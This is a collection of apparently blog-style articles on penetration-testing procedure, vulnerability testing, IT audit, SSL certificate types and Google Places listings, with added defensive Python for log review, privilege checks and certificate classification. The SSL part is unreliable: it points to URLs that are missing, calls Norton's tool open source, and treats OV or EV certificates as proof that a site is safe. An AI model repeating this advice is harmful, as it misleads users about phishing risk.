The task of penetration testing can be performed by a qualified third-party agent as long as they are organizationally independent. What I mean is that they must be organizationally separate from the management of the client or the target system. For example, if a PCI DSS company serves as our assessment entity and is also the third-party company carrying out the assessment, they cannot conduct the pen test because they’re involved in the installation, maintenance or support of the target systems.
The following guidelines can be useful in your choice of a good and qualified penetration tester:
Certifications for a penetration tester: The certifications a penetration tester holds are a very indicative guide to their level of competence and skill. While these certifications may not be required, they can indicate a common body of knowledge for the tester. These are a few among many certifications a penetration tester can have:
- Certified Ethical Hacker (CEH)
- Offensive Security Certified Professional (OSCP)
- Global Information Assurance Certification (GIAC)
- Computer Information System Security Professional (CISSP)
- GIAC Certified Penetration Tester (GPEN)
- EC-Council Security Analyst (ECSA)
- Licensed Penetration Tester (LPT)
- GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
Always remember that before any test begins, it is recommended that all parties be involved: the organization, the pen tester and, where applicable, the assessor. They must all be aware of the types of test being performed (i.e. external, internal, network layer or application), how the test will be performed, and the target.
Steps to Perform a Detailed Penetration Testing
1. Scoping of the organization: The responsibility of the organization is to adequately define the critical systems. The normal recommendation is that the organization works hand in hand with the pen tester whenever applicable. The assessor also plays a major role here, verifying that none of the components are overlooked and determining whether there are additional systems to include in the scope. The scope of the penetration test should include the critical systems, the access points and the methods for segmentation.
2. Documentation: Documentation for all components within the scope should be made available to the tester whenever necessary. Documents include:
- Application interface documentation
- Guides to the implementation
This will help the tester to understand the functionality of the system. Other information which the organization needs to supply to the tester includes:
- Network diagram showing all the network segments
- Data flow diagram
- Detailed list of all services and ports that are exposed at the perimeter
- List of the isolated network segments
The pen tester uses all this information to assess and identify all unexpected attack vectors and any insufficient authentication controls.
3. Rules of Engagement: Before any test begins, it is very important to agree on and document the terms and conditions under which the test is performed and the extent of exploitation allowed. This gives the pen tester authority over the test environment and makes sure the organization understands the test and what to expect from it. The following should be considered as rules of engagement:
- In what time window will the test be performed?
- Are there known issues in the systems, or issues with automated scanning? If so, will such systems still be tested?
- Are there preferred methods of communication about the scope and about any issues encountered in the course of the test?
- Are there any security controls that could detect the testing?
- Will passwords or any sensitive data be exposed during the test?
- Will the equipment to be used by the tester pose any threat to the systems in the organization?
- Are OSes, service packs and patches up to date, and should the tester provide all the IP addresses from which the test will originate?
- What steps should the tester take on detecting a flaw or loophole?
- Will the tester retain any data obtained during the test?
4. Third-party Hosted/Cloud environments: The following should be added to the rules of engagement.
- Whether the service-level agreement requires approval from the third party before the test commences.
- Web management portals that are provided by the third party to manage the infrastructure should not be included unless noted in the scope.
5. Criteria for success: Pen testing is supposed to simulate a real-world attack, with the aim of identifying how far an attacker can go in penetrating the systems. Defining the success criteria for the pen test therefore allows the entity to set limits for the test. Success criteria should be included in the rules of engagement and should include:
- Direct observation of restricted services or data in the absence of access controls
- Level of compromise of the domain being used by legitimate users
6. Review of past vulnerabilities and threats: This involves a review and consideration of all the threats and vulnerabilities that were encountered in the last 12 months. It is a historical look at the organization’s environment since the last assessment was performed. This information is very important because it gives insight into how to handle the current vulnerabilities. Depending on whether a white box, grey box or black box test is to be performed, the following are not to be included in the review:
- Vulnerabilities discovered by the organization that have not been resolved within a certain time
- Compensating controls in place for the discovered vulnerabilities
- Upgrades or deployments that are in progress
- Threats and vulnerabilities that have led to a possible data breach
- Valid remediation of pen test findings from past years
7. Segmentation: This is done by conducting the tests used during the initial stage of a network penetration test, such as port scans and host discovery. It is performed to verify that none of the isolated LANs has access to the database. Testing each of these unique segments should ensure that security controls are working as intended. The pen tester should check what access each LAN segment has into the organization and that this access is restricted.
8. Post Exploitation: This means taking actions after an initial compromise of the system. It refers to the methodical approach of using pivoting techniques and privilege escalation to establish a new source of attack. This can be done from a vantage point in the system in order to gain access to the network resources.
9. Post-Engagement: The following activities should be carried out after the engagement or testing has been performed:
- Remediation best practices
- Retesting all the identified vulnerabilities
10. Cleaning up of the work environment: After the pen test has been performed, it is necessary to do a thorough cleanup of the working environment. The tester documents any alterations that have been made to the environment and informs the organization of them. These include, but are not limited to:
- Tools installed by the tester on the organization’s systems
- Created accounts during part of the assessment
- Changed passwords for accounts
- Any additional documents not related to the organization
11. Reporting and Documentation: A report helps an organization in its efforts to improve its security posture and to identify any areas that are vulnerable to threats. A report should be structured in such a way that the test, and how it was carried out, is clearly communicated. The report should be done in the following steps:
- Report identified vulnerabilities
- Any firewall misconfigurations
- Report of detected credentials that were obtained through manipulation of the web application.
Penetration testing is a typical learning experience for everyone in the organization who is involved in it, as well as for the tester. The testers get to discover and learn what works and what does not work against the entity being tested. They can also learn how to adapt to the customer’s defenses. The client, i.e. the organization, gets to learn what they should have known and done, what is less effective, and finally to appreciate what is applicable. The pen tester then tries to pick up the pieces and build a strong, long-term relationship with the client.
First of all, let us understand what a vulnerability is. I’ll define a vulnerability as any form of loophole, weakness or mistake found in a system’s security design, its implementation, its security procedures or its controls that can lead to a violation of the system’s security policy. A vulnerability can make it possible for a cybercriminal or attacker to gain unauthorized access to the system.
As we already know, confidentiality, integrity and availability are the three cores of IT security. Once any or all of these elements are compromised, one can say there is a security vulnerability. In fact, a single security vulnerability has the potential to compromise one or all of these elements. For example, confidentiality can be compromised by an information disclosure vulnerability, while integrity and availability can be compromised as a result of remote code execution.
What is Vulnerability Testing?
Vulnerability testing, also referred to as vulnerability assessment, is a software testing technique conducted in order to evaluate the inherent risk in an IT system and the measures employed to reduce or curb the probability of the event.
Vulnerability testing has some similarities with risk assessment and these assessments can be performed following some steps as highlighted below.
- Developing a catalogue for assets and resources in the system.
- Assigning rank orders to quantify resources by value and importance.
- Identifying the potential threats and vulnerabilities to the resources.
- Eliminating totally or mitigating the high ranked vulnerabilities for the most valuable resources.
Vulnerability testing depends majorly on 2 mechanisms
- Vulnerability assessment
- Penetration testing
Objectives of Vulnerability Testing
The common goals and objectives of risk and vulnerability assessments are as follows;
- To get an accurate inventory of all data and IT assets.
- To prioritize organizational IT and data assets according to the importance and criticality to the organization
- To identify and document all the potential risks, threats and vulnerabilities to the organizational infrastructural assets.
- To prioritize the potential risks, threats and known vulnerabilities based on their impact or criticality on the IT or data assets being affected.
- To identify and minimize the vulnerability window of the organizational IT and data assets according to the minimum acceptable tolerance level.
- To curb, mitigate or remediate the identified risks, threats and vulnerabilities and properly plan and budget them based on the criticality of the IT and data assets.
- To check for compliance with the updated information security laws, regulations, procedures and mandates
- As explained previously, to help identify lapses, voids and gaps in the organization’s IT security framework and architecture, with specific recommendations.
- To identify the potential risks, threats and vulnerabilities that an organization is susceptible to, and to justify the cost of all the security countermeasures and solutions to be adopted in order to mitigate, eliminate or reduce them.
- To provide an objective assessment and prompt recommendation to help define the organizations goals and objectives for performing risk and vulnerability assessment.
- It helps organizations to understand the return on investments (ROI) whenever funds are to be invested in the IT security infrastructure.
- To scan operating systems, application software and the entire network for known vulnerabilities such as insecure authentication and software design.
Scope of Vulnerability Testing
- Black Box Testing: It involves performing vulnerability testing from an external network with no prior knowledge of the internal network infrastructure and systems.
- White box testing: It involves performing vulnerability testing within an internal network with prior knowledge of the internal network infrastructure and systems. White box testing can also be referred to as internal testing.
- Grey box testing: It involves performing vulnerability testing from either an external or internal network with little knowledge of the internal network infrastructure and system. It is a combination of black box and white box testing.
Elements of Vulnerability Testing
- Information Gathering: This can also be referred to as reconnaissance, and it deals with obtaining as much information as possible about an IT environment, such as networks, IP addresses and the versions of operating systems in use. It is applicable to all 3 scopes of vulnerability assessment.
- Detection of vulnerability: This process involves the use of vulnerability scanners to scan the IT environment to identify the unknown and potential vulnerabilities.
- Information analysis and planning: It involves the analysis of all the vulnerabilities that have been identified and further devising a means to penetrate into the network and the systems.
Types of Vulnerability Test
- Predefined Tests: These are vulnerability tests designed to discover some common vulnerabilities in databases and their environments. Predefined tests can be customized to suit the needs or requirements of an organization. Predefined tests include:
  - Configuration Tests: These check a database for all configuration settings related to security, looking for common flaws and mistakes in database configurations. Such configuration issues include:
    - Privilege: This includes system-level rights, privileged access to databases and users, and rights of use and creation of objects.
    - Configuration: This includes parameter settings for the database and parameter settings at the system level.
    - Authentication: This includes the use of accounts by users, the use of remote logins, and password policies.
    - Version: This includes the versions of the database and the patches for the database.
    - Object: This involves sample databases that have been installed, database layouts that have been recommended, and ownership of the databases.
  - Behavioral Tests: This test type checks and analyses the security posture and wellbeing of the database environment. It does this by observing the database in real time and checking how information is manipulated. Some of the behavioral tests include:
    - Violations of access rules
    - Excessive login failures
    - Excessive SQL errors
    - Access by default users
    - After-hours logins
    - Execution of DDL and DBCC commands from the client side of the database
    - Checks on stored procedure calls
    - Checks that user IDs are not used from multiple IP addresses
- Query-based vulnerability tests: This test type can be either a predefined test or a user-defined test that can be created easily and quickly by modifying SQL queries, which can be run against database entities or resources.
- CVE (Common Vulnerabilities and Exposures) Tests: This test type monitors the Common Vulnerabilities and Exposures published by the MITRE Corporation and adds test results for the vulnerabilities that relate to the database.
- CAS-based Tests: This test type can be either a predefined test or a user-defined test, and is based on a CAS template item of the OS script command type. It uses the collected data. Users can therefore choose which template item to use and test it against the contents of the CAS results.
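Several of the behavioral tests listed above can be expressed as detection logic over database audit records. The following is an added example, not part of the original article or of any scanner product: the log format, thresholds, default-user list and function names are all assumptions made for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample audit records (assumed format, not from a real database).
SAMPLE_LOG = """\
2024-03-04T09:12:01 user=app_sales ip=10.0.5.21 event=LOGIN_OK
2024-03-04T09:13:40 user=jdoe ip=10.0.7.14 event=LOGIN_FAIL
2024-03-04T09:13:44 user=jdoe ip=10.0.7.14 event=LOGIN_FAIL
2024-03-04T09:13:49 user=jdoe ip=10.0.7.14 event=LOGIN_FAIL
2024-03-04T09:13:55 user=jdoe ip=10.0.7.14 event=LOGIN_FAIL
2024-03-04T10:02:10 user=app_sales ip=10.0.5.21 event=SQL stmt=SELECT id FROM orders
2024-03-04T10:40:02 user=etl ip=10.0.5.40 event=SQL_ERROR
2024-03-04T10:40:03 user=etl ip=10.0.5.40 event=SQL_ERROR
2024-03-04T10:40:05 user=etl ip=10.0.5.40 event=SQL_ERROR
2024-03-04T11:30:00 user=report ip=10.0.5.30 event=SQL stmt=DROP TABLE audit_trail
2024-03-04T14:05:12 user=app_sales ip=10.0.9.77 event=LOGIN_OK
2024-03-05T02:41:09 user=mkay ip=10.0.7.20 event=LOGIN_OK
2024-03-05T08:15:00 user=sa ip=10.0.5.5 event=LOGIN_OK
"""

# Policy values below are assumptions chosen for the example.
THRESHOLDS = {"LOGIN_FAIL": ("excessive_login_failures", 3),
              "SQL_ERROR": ("excessive_sql_errors", 2)}
BUSINESS_HOURS = range(7, 19)            # 07:00-18:59 local time
DEFAULT_USERS = {"sa", "scott", "guest"}
ADMIN_STMT = re.compile(r"^\s*(CREATE|ALTER|DROP|TRUNCATE|DBCC)\b", re.I)
LINE = re.compile(r"^(\S+) user=(\S+) ip=(\S+) event=(\S+)(?: stmt=(.*))?$")


def parse(log):
    """Turn audit lines into event dicts; lines that do not match are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        ts, user, ip, event, stmt = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "ip": ip, "event": event, "stmt": stmt or ""})
    return events


def behavioral_findings(events):
    """Return a sorted list of (check_name, user) pairs that violate policy."""
    findings = set()
    counts = Counter()
    source_ips = defaultdict(set)
    for e in events:
        user = e["user"]
        source_ips[user].add(e["ip"])
        counts[(e["event"], user)] += 1
        if e["event"] == "LOGIN_OK":
            if e["ts"].hour not in BUSINESS_HOURS:
                findings.add(("after_hours_login", user))
            if user.lower() in DEFAULT_USERS:
                findings.add(("default_user_access", user))
        elif e["event"] == "SQL" and ADMIN_STMT.match(e["stmt"]):
            findings.add(("ddl_or_dbcc_from_client", user))
    # Threshold checks: more failures or errors than the policy allows.
    for (event, user), n in counts.items():
        if event in THRESHOLDS and n > THRESHOLDS[event][1]:
            findings.add((THRESHOLDS[event][0], user))
    # One user ID seen from more than one source address.
    for user, ips in source_ips.items():
        if len(ips) > 1:
            findings.add(("multiple_source_ips", user))
    return sorted(findings)


if __name__ == "__main__":
    for check, user in behavioral_findings(parse(SAMPLE_LOG)):
        print(f"{check}: {user}")
```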
Vulnerability Testing Methodologies
- Begin the documentation process of all assets
- Secure permissions to credentials and assets
- Perform tools update
- Configure the tools
- Execute the test:
  - Run the tools to begin execution
  - Run all the captured data packets while running the assessment tools. (A packet is a unit of data that is crafted to be routed from a source to a destination. If a file, whether an email, HTML or a URL request, is sent from one point to another on the internet, the TCP layer of TCP/IP divides the file into small chunks for efficient routing, each having a sequence number in its header. These small individual chunks are referred to as packets. At the destination end, the packets are reassembled to form the original file that was sent.)
- Analyze the vulnerabilities:
  - Define and classify the system resources as well as the network
  - Prioritize the resources based on their importance, such as High, Medium or Low
  - Identify all potential threats to the assets
  - Based on the priorities, develop a strategy to handle the highest-priority problems first
  - Define and implement measures to mitigate or minimize the consequences of an attack
- Form a report: Develop a report of all the steps you took to arrive at your results. The report is also important as a guide to aid future understanding of the system, as well as for reporting to the management of the organization.
- Remediation plans: This process involves developing measures and taking the appropriate steps to fix the vulnerabilities.
Responsibilities of a Vulnerability Tester
- Unit management, such as Information Security Coordinators and Unit IT supervisors:
  - They support and enforce the standards, and approve and submit the annual risk assessment documents to management.
  - They determine the person who maintains the documentation.
  - They also request internal audits, and procure and assign the resources needed to implement the standards and policies.
  - They notify the users and support staff who are involved in performing the test.
  - They also request any exceptions.
  - They supervise and coordinate the vulnerability test and also the remediation processes.
- The System Administrator and Computing Device Administrator:
  - They implement the best practices needed to comply with the test.
  - They support and comply with the policies.
  - They scan all the systems and devices in the network for compliance with the standards.
  - They actively monitor the systems for available patches in order to remediate issues that can affect the user.
- Information Security Officer:
  - They approve and oversee all the vulnerability scans.
  - They review and approve the use of any alternative scanning tools when required.
  - They conduct reviews and risk assessments annually.
  - They authorize the removal of network devices from the network when needed.
Vulnerability testing focuses on determining loopholes and weaknesses in an IT infrastructure. In my next article I will try to shed some more light on the tools which can be used to perform vulnerability testing, since we already have the standard methodologies to follow in order to perform a detailed vulnerability test.
An IT audit attempts to evaluate the controls surrounding data as they relate to confidentiality, integrity, and availability. IT audits ensure the confidentiality of information, and ensure its integrity and availability, which is a key factor in recovering from an incident.
This is a follow-up article on IT audits, in which I will dissect the methodologies and steps for performing audits in more detail.
One of the important factors in IT auditing, and one with which audit management struggles consistently, is ensuring that adequate IT audit resources are available to perform the IT audits. IT audits, quite unlike financial audits, are very intensive in terms of knowledge. For example, if an IT auditor is performing a web application audit, they need to be trained in web applications; if they are doing an Oracle database audit, they need to be trained in Oracle; if they are doing a Windows operating system audit, they need to have some training in Windows, and not just XP: they’ll need exposure to Vista, Windows 7, Server 2003, Server 2008, IIS, SQL Server and Exchange.
Another factor that audit management faces is the actual management of the IT auditors: not only must they track time against audit objectives, they must also allow time to follow up on corrective actions taken by the client in response to previous findings and/or recommendations.
The following are the things that an IT expert needs to do before beginning an audit:
- Perform a review of the organizational structure of the IT assets
- Perform a review of all IT policies and procedures
- Perform a review of all the IT standards
- Perform a review of the IT documentations
- Perform a review of the organization’s BIA
- Conduct interviews with the authorized personnel
- Observe and monitor the processes and the performance of the employees
- Examine the testing of controls, and the results gotten from the tests.
Steps to Perform IT Audits
1. Understand the Audit Subject Area
- Perform a tour of all the facilities related to audit
- Perform a review of the background materials
- Review the IT and business strategic plans
- Interview the key managers in order to understand the business
- Review audit reports that have been in existence
- Identify regulations and where they have been applied
- Identify the areas that have been outsourced
2. Perform an Audit Engagement Plan Vocabulary
Subject of the Audit: The area that is to be audited. An example is the information systems related to sales
The objective of the Audit: The purpose of performing the audit. An example is determining if the sales database is safe against data breaches, due to inappropriate authentication, access control, or hacking.
Scope of the Audit: Narrowing the audit to a specific system, function, unit or period of time. An example is determining whether the scope is constrained to Headquarters for the last year.
3. Perform Risk Assessment: Risk-Based Auditing
Inherent risk: The susceptibility of the system to a risk. An example is a bank’s inherent risk of being robbed.
Control risk: The risk that a problem exists and will not be detected by the internal control system. Still using the bank as an example, a thief accesses a customer’s account at a money machine and is not detected.
Detection risk: The risk that an auditor does not detect a problem that does exist. In the case of the bank, a fraud takes place but is not detected.
Overall audit risk: The combination of all the audit risks.
4. Audit Engagement Risk Analysis
5. Prepare an Audit Engagement Plan
- Develop a risk-based approach
- Include audit objectives, required resources, timing, scope
- Comply with all applicable laws
- Develop an audit program and procedures
6. Add Detail to Plan
7. Evaluate Controls:
8. Classification of IT controls
- Corrective controls: These involve fixing problems to prevent future problems, using:
  - Contingency planning
  - Backup procedures
- Detective controls: These involve finding any form of fraud when it occurs, using:
  - Hash totals
  - Check points
  - Duplicate checking
  - Error messages
  - Past-due account reports
  - Review of activity logs
- Preventive controls: Preventive control measures include:
  - Programmed edit checks
  - Encryption software
  - Access control software
  - A well-designed set of procedures
  - Physical controls
  - Employing only qualified personnel
9. Evaluate Controls: Simple Control Matrix
- Test the Vocabulary
Compliance Testing: A compliance test should take this form
- Are there controls in place and are they consistently applied?
- Check access control
- Ensure program change control
- Procedure documentation
- Program documentation
- Software license audits
- System log reviews
- Exception follow-ups
Substantive Testing: Check the following:
- Are transactions processed accurately?
- Is data collected correct and accurate?
- Double check processing
- Calculation validation
- Error checking
- Operational documentation
If the results for the compliance testing are poor, the substantive testing should increase in type and sample number.
Compliance Testing: It should check the following:
- Control: Is production software controlled?
  - Test: Are production executable files built from production source files?
  - Test: Are proper procedures followed in their release?
- Control: Is access to the sales database constrained to least privilege?
  - Test: Are permissions allocated according to documentation?
  - Test: When persons gain access to the database, can they access only what is allowed?
- Audit: Is the financial statement section related to sales accurate?
  - Test: Track the processing of sample transactions through the system by performing calculations manually
  - Test: Test error conditions
- Audit: Is the tape inventory correct?
  - Test: Search for sample days and verify complete documentation and tape completeness
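The least-privilege control above ("Are permissions allocated according to documentation?") can be tested by resolving each account's effective privileges, including those inherited through roles, and comparing them with the documented access matrix. The following is an added example, not part of the original article: the account names, roles, grants and function names are constructed for illustration, and a real audit would export the grants from the database catalog.

```python
# Documented access matrix: account -> {(object, privilege)} (constructed sample).
DOCUMENTED = {
    "sales_app": {("sales.orders", "SELECT"), ("sales.orders", "INSERT"),
                  ("sales.orders", "UPDATE")},
    "sales_report": {("sales.orders", "SELECT")},
}

# Login accounts found in the database (constructed sample).
ACCOUNTS = ["sales_app", "sales_report", "temp_contractor"]

# Role membership: principal -> roles granted to it (constructed sample).
MEMBER_OF = {
    "sales_report": {"reporting_role"},
    "reporting_role": {"readonly_role"},
    "temp_contractor": {"readonly_role"},
}

# Direct grants as exported from the catalog: (grantee, object, privilege).
DIRECT_GRANTS = [
    ("sales_app", "sales.orders", "SELECT"),
    ("sales_app", "sales.orders", "INSERT"),
    ("sales_app", "sales.customers", "DELETE"),
    ("readonly_role", "sales.orders", "SELECT"),
    ("reporting_role", "sales.customers", "SELECT"),
]


def effective_privileges(principal, member_of, grants):
    """Privileges held directly or inherited through nested roles."""
    seen, stack, privileges = set(), [principal], set()
    while stack:
        current = stack.pop()
        if current in seen:              # guards against circular role grants
            continue
        seen.add(current)
        privileges |= {(obj, priv) for g, obj, priv in grants if g == current}
        stack.extend(member_of.get(current, ()))
    return privileges


def least_privilege_findings(accounts, documented, member_of, grants):
    """Report accounts whose effective access differs from the documentation."""
    findings = {}
    for account in accounts:
        allowed = documented.get(account, set())
        actual = effective_privileges(account, member_of, grants)
        excess = actual - allowed        # access held but not documented
        missing = allowed - actual       # documented but not actually granted
        if excess or missing or account not in documented:
            findings[account] = {
                "documented": account in documented,
                "excess": sorted(excess),
                "missing": sorted(missing),
            }
    return findings


if __name__ == "__main__":
    report = least_privilege_findings(ACCOUNTS, DOCUMENTED, MEMBER_OF, DIRECT_GRANTS)
    for account, detail in report.items():
        print(account, detail)
```

Excess privileges that arrive only through a role, as with `sales_report` here, are the ones a review of direct grants alone would miss.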
Tools for IT Audits
ISACA has Standards and Guidelines related to Audit
- Section 2200 General Standards
- Section 2400 Performance Standards
- Section 2600 Reporting Standards
- Section 3000 IT Assurance Guidelines
- Section 3200 Enterprise Topics
- Section 3400 IT Management Processes
- Section 3600 IT Audit and Assurance Processes
- Section 3800 IT Audit and Assurance Management
- Translate the basic audit objectives into specific IT audit objectives
- Identify and select the best audit approach to verify and test controls
- Identify individuals to interview
- Obtain departmental policies, standards, procedures, guidelines to review
- Develop audit tools and methodology
IT General Controls Check List
1. Documentation of employees and the organization
- Draw an organizational Chart
- IT Department
- Current Phone List/Company Directory
- Job Descriptions for the IT Department
- Sample of Employee Evaluation Form
- List of all the terminations/ disengagements in the last 12 months.
- Checklist of newly hired employees
- Termination Checklist
- IT Project List: Is each project planned, completed in the last 12 months, or ongoing?
- Review of the past year’s management response letter
2. Documentation of IT policies and procedures
- Obtain a network architecture diagram and documentation
- Obtain a network diagram
- Obtain a diagram and lists of hosts and servers that are running financial applications
- Change management policies and procedures
- Make an inventory of network hardware and software
- Determine the computer operations and their policies and procedures
- Lay down security policies
- Enforce password policies
- Acceptable Use Policy
- Lay down incident response policies
- Get a curriculum for security awareness training
- Configure firewalls and rule sets
- Obtain software policies and procedures
- Set up remote access policies
- Set up policies for emails, instant messaging and internet usage
- Develop a disaster recovery and business contingency plan
- Set up policies for data backup and data recovery
- Get backup logs
- Offsite tape rotation logs
- Obtain a listing of IT-related insurance coverage
- Get copies of vendor contracts and service level agreements
- Deploy an organized help desk with help desk request tracking forms and trouble tickets
- Report open and closed tickets
- Employ batch processing
When performing an IT audit, the responsibility of the auditor general is to check whether the IT system complies with government IT policies, procedures, standards, laws and regulations. The auditor general should also endeavor to use IT audit tools, technical guides and the resources recommended by ISACA (Information Systems Audit and Control Association) where appropriate. The resources recommended by ISACA should also encourage the IT audit staff, and the team as a whole, to become certified. Certifications include, to name but a few:
- CISA (Certified Information systems Auditor)
- CIA (Certified Internal Auditor)
- CISM (Certified Information Security Manager)
- CGEIT (Certified in the Governance of Enterprise IT)
The Audit reports
After a successful audit process, the IT auditor needs to do a detailed documentation. Here is a list of a few things an auditor needs to include in the audit.
- Plan and prepare the scope and objectives for the audit
- Describe the scope of the audit area
- Draft an audit program
- Write down the steps performed and gather the audit evidence
- State whether the services of other auditors and IT experts were used, and what their contributions were
- Document your findings, and make conclusions and recommendations
- Document the audit with document dates and identification
- The report obtained as a result of the audit performed
- Evidence of audit supervisory review
The audit results should be submitted to the organization upon exit where you can take out time to discuss in details your findings and recommendations. You should be certain of the following;
- That all the facts and findings noted down on this report are accurate
- That the recommendations you’ve made are cost-effective and realistic, and that there are alternatives which can be negotiated with management
- That the dates for the recommended implementation will be agreed.
There are some other things you need to consider when you’re preparing to present your final report. You need to consider the audience, and whether the presentation is going to be made to the audit committee. The audit committee may not really notice the minutiae that go into the business report. Your report should be delivered in a timely manner so as to leave room for any corrections.
Finally, if you come across a significant finding in the course of the IT audit, you should inform management immediately.
Secure Connections: What You Need to Know About SSL Certificates: SOUTECH Cybersecurity Tips and Training in Nigeria
Esang U. E
The first purchase using an online transaction took place at a Pizza Hut, where the customer purchased a large pepperoni pizza with extra cheese and mushrooms. But 20 years later, e-commerce has become a bustling economy, with over $1.2 trillion in sales in the year 2013.
The growth in online purchases was solidly built on the foundation of trust. By this I mean that people have grown to trust that the websites they make purchases on are legitimate and largely secure, because of the Secure Sockets Layer (SSL) certificates that show up in the URL bar of your browser as a little green padlock.
An SSL certificate indicates, first of all, that there is a secure connection between your personal device and the company website. It also verifies that the provider is who they claim to be. It is very important that you understand the role of an SSL certificate, to prevent you from falling prey to scammers and cybercriminals. This is because not all the sites you visit that have SSL certificates as protection are created equal.
SSL certificates are provided by Certificate Authorities (CAs), and website owners purchase their certificates from them. Different types of SSL certificates provide different levels and layers of security, and this has caused issues over time. The issue is that, even though all of these certificates provide the safety padlock in your browser along with HTTPS (where “S” means “Secure”) in the address bar, the security levels they provide differ to a large extent. This is the reason why I’m trying to help you understand what type of SSL certificate a website uses, especially when you want to do any financial transaction or anything that is related to your personal financial credentials.
I’ll throw some more light on the types of certificates and how they work.
Types of Certificates
- Domain Validator (DV): The domain validator simply verifies the owner of a site. In this case, the CA just has to send an email to the email address with which the website was registered. This is done in order to verify the identity of the website owner. Many cybercriminals make use of the domain validator because they can obtain it easily and, by so doing, make the website appear far more secure than it actually is. Over time, cybercriminals have taken to using DV certificates to lure users to phishing websites, i.e. websites that look legitimate but are crafted for the sole purpose of stealing a user’s sensitive data.
- Organizational Validators (OV): The process of obtaining an OV certificate takes a longer period. For an OV certificate to be obtained, the CA needs to validate some basic information such as the organization, the physical location of the organization and its website domain.
- Extended Validator (EV): This is the highest level of security and often the easiest to identify. The process of issuing an EV certificate tries to increase the level of confidence in the business by making the CA perform an enhanced review of the applicant. This review involves an examination of corporate documents, confirmation of the identity of the applicant and checks against third-party databases for information. In the browser’s URL bar, this adds the “S” that is a part of HTTPS, the company’s name in green and also the padlock.
Now take a look at these URLs and try to notice the difference. The first is the DV certificate; the second is an OV certificate, which actually looks like the first. The only difference is the “.” before the com.
Now the last one clearly is an EV certificate.
What can you do to be safe?
Now that you know what an SSL certificate is, its importance, the three different types, and that a DV-enabled site poses a huge risk of being scammed, I’ll give a few tips on how to reduce the risk when performing any form of online transaction that involves your sensitive credentials.
- Be Alert: The fact that a website has a padlock or HTTPS next to its URL is not a guarantee that it is safe for financial transactions. Users are used to looking out for these two things before performing any transaction, which is all the more reason why cybercriminals go through the trouble of obtaining SSL certificates: to make the site look legitimate.
- Look out for the SSL certificate type that a website has: The first thing you should do is look for visual cues that indicate security, like a green color and a lock symbol in the address bar of your browser. Just a quick reminder once again that only an EV-enabled website has the company name in the address bar. However, browsers do not clearly display the difference between a DV and an OV certificate, so to help you tell the difference, there is an open source tool (https://safeweb.norton.com/) developed by Norton. All you have to do is copy the URL and paste it directly into the tool. The tool will tell you whether the site is DV, OV or EV-enabled and give more explicit results on whether the site is legitimate and safe.
- Perform transactions only on OV and EV-enabled websites: If you analyze the URL with the tool I just explained above and the result says that the site has a DV certificate, have a rethink about conducting any transaction with that site. If it is an OV or EV-enabled site, then you can conduct your transaction with confidence that your business information is safe.
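Browsers hide the difference between DV and OV, but the certificate's subject carries it. The following is an added example, not part of the original article: it classifies a certificate in the format returned by Python's `ssl` module, assuming the issuing CA follows the CA/Browser Forum rules (no organization name in a DV subject, an organization name in OV, and business category, registration number and jurisdiction in EV). The function names and sample certificates are constructed for illustration.

```python
import socket
import ssl

# Subject attributes the CA/Browser Forum EV Guidelines require in an EV
# certificate. Older OpenSSL builds report the jurisdiction field as a raw OID.
EV_MARKERS = {"businessCategory", "serialNumber"}
JURISDICTION = {"jurisdictionCountryName", "1.3.6.1.4.1.311.60.2.1.3"}


def subject_fields(cert):
    """Flatten getpeercert()'s nested subject tuples into {name: value}."""
    return {name: value for rdn in cert.get("subject", ()) for name, value in rdn}


def classify(cert):
    """Return 'EV', 'OV', 'DV' or 'UNKNOWN' for a getpeercert()-style dict."""
    names = set(subject_fields(cert))
    if not names:
        # getpeercert() returns {} when the certificate was not verified,
        # so there is nothing trustworthy to classify.
        return "UNKNOWN"
    if "organizationName" not in names:
        return "DV"  # only control of the domain was checked
    if EV_MARKERS <= names and JURISDICTION & names:
        return "EV"
    return "OV"


def describe(cert):
    """Return (validation level, organization name or None)."""
    return classify(cert), subject_fields(cert).get("organizationName")


def fetch_cert(host, port=443, timeout=5.0):
    """Fetch the verified leaf certificate of a live site (needs network)."""
    ctx = ssl.create_default_context()  # verifies the chain and the hostname
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


# Constructed sample certificates in getpeercert() format (not real sites).
SAMPLE_DV = {"subject": ((("commonName", "shop.example"),),)}
SAMPLE_OV = {"subject": (
    (("countryName", "NG"),),
    (("organizationName", "Example Stores Ltd"),),
    (("commonName", "shop.example"),),
)}
SAMPLE_EV = {"subject": (
    (("businessCategory", "Private Organization"),),
    (("jurisdictionCountryName", "NG"),),
    (("serialNumber", "RC-0000000"),),
    (("countryName", "NG"),),
    (("organizationName", "Example Bank Plc"),),
    (("commonName", "bank.example"),),
)}

if __name__ == "__main__":
    for label, cert in (("dv", SAMPLE_DV), ("ov", SAMPLE_OV), ("ev", SAMPLE_EV)):
        print(label, describe(cert))
```

Treat the result as a heuristic: the authoritative marker is the policy OID inside the certificate (2.23.140.1.2.1 for DV, 2.23.140.1.2.2 for OV, 2.23.140.1.1 for EV), which `getpeercert()` does not expose.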
Online transactions have come to stay and will not be phased out anytime soon. People will have to bear with the crude task of combating cybercriminals when it comes to phishing. Knowing the risk ahead of time helps you avoid becoming a victim of phishing websites.
ADDING YOUR BUSINESS TO GOOGLE PLACES.
Adding your business or services on Google Maps enhances online visibility even if your business is entirely mobile or online. If you aren’t operating a brick-and-mortar storefront, though, you may not want to post an address — and you don’t have to. Adding your business on Google Maps is simply done by setting up a profile in Google Places for Business. During this process, you can choose to suppress your street address and list service areas instead.
CREATE A GOOGLE PLACES PROFILE
First, you must have a Google account. Sign in to Google Places for Business with your valid Google account. If you don’t have a Google account, you can create one for free.
Your business phone number is a primary piece of contact information, especially if you are running a mobile or online business. You will need to provide your business phone number for easy identification of your business or services.
Also needed is some Basic Information which includes your business address. Google will require that you submit a valid mailing address for your business. You can disguise this address from searchers, however, you can also use a different criterion like “service areas” to define your location on Google Maps.
MORE ABOUT YOUR SERVICES
Choosing the “service areas” option means your business serves customers at their locations in your chosen service areas. This option is available if you do not want your address to be listed. Of course, you will have to indicate the distance you can cover from one location if you offer mobile services.
The list of areas served option enables you to choose the cities, states and countries you serve, a good way of letting Google speak on your behalf.
